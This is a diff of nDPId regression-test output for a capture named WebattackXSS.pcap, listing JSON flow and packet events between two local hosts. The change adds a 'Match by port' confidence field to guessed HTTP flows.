-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347589555,"flow_last_seen":1499347594779,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347589555,"flow_last_seen":1499347594779,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347589555,"flow_last_seen":1499347594779,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347592060,"flow_last_seen":1499347597780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347592060,"flow_last_seen":1499347597780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347592060,"flow_last_seen":1499347597780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347593330,"flow_last_seen":1499347598782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347593330,"flow_last_seen":1499347598782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347593330,"flow_last_seen":1499347598782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347594595,"flow_last_seen":1499347599780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347594595,"flow_last_seen":1499347599780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347594595,"flow_last_seen":1499347599780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347712277,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347712277,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nw9AAD4GJsGsEAABwKgKMurmAFCpjSAeAAAAAKACchDp1AAAAgQFtAQCCAoBO78RAAAAAAEDAwc="}
@@ -2516,17 +2516,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1499347720094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347720094,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qt5AAD4GGvKsEAABwKgKMus8AFAqiGxqAAAAAKACchAUlQAAAgQFtAQCCAoBO8a0AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":2,"flow_last_seen":1499347720095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347720095,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6zwJv9VKKohsa6AScSCaWwAAAgQFtAQCCAoD5ZgpATvGtAEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":3,"flow_last_seen":1499347720095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347720095,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qt9AAD4GGvmsEAABwKgKMus8AFAqiGxrCb\/VS4AQAOU5YwAAAQEICgE7xrQD5Zgp"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347602223,"flow_last_seen":1499347607783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347602223,"flow_last_seen":1499347607783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347602223,"flow_last_seen":1499347607783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347603507,"flow_last_seen":1499347608786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347603507,"flow_last_seen":1499347608786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347603507,"flow_last_seen":1499347608786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347604752,"flow_last_seen":1499347609784,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347604752,"flow_last_seen":1499347609784,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347604752,"flow_last_seen":1499347609784,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347597121,"flow_last_seen":1499347602781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347597121,"flow_last_seen":1499347602781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347597121,"flow_last_seen":1499347602781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347598383,"flow_last_seen":1499347603782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347598383,"flow_last_seen":1499347603782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347598383,"flow_last_seen":1499347603782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347599663,"flow_last_seen":1499347604783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347599663,"flow_last_seen":1499347604783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347599663,"flow_last_seen":1499347604783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6289,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347721376,"flow_last_seen":1499347721376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347721376,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6289,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1499347721376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347721376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UaNAAD4GdC2sEAABwKgKMutKAFCqmpZXAAAAAKACchBpRwAAAgQFtAQCCAoBO8f0AAAAAAEDAwc="}
@@ -2552,17 +2552,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1499347730501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347730501,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83upAAD4G5uWsEAABwKgKMuuoAFBoeQ40AAAAAKACchAqRAAAAgQFtAQCCAoBO9DeAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6364,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":2,"flow_last_seen":1499347730501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347730501,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ66jFwizsaHkONaAScSCSPAAAAgQFtAQCCAoD5aJSATvQ3gEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":3,"flow_last_seen":1499347730502,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347730502,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03utAAD4G5uysEAABwKgKMuuoAFBoeQ41xcIs7YAQAOUxRAAAAQEICgE70N4D5aJS"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347606078,"flow_last_seen":1499347611787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347606078,"flow_last_seen":1499347611787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347606078,"flow_last_seen":1499347611787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347607344,"flow_last_seen":1499347612785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347607344,"flow_last_seen":1499347612785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
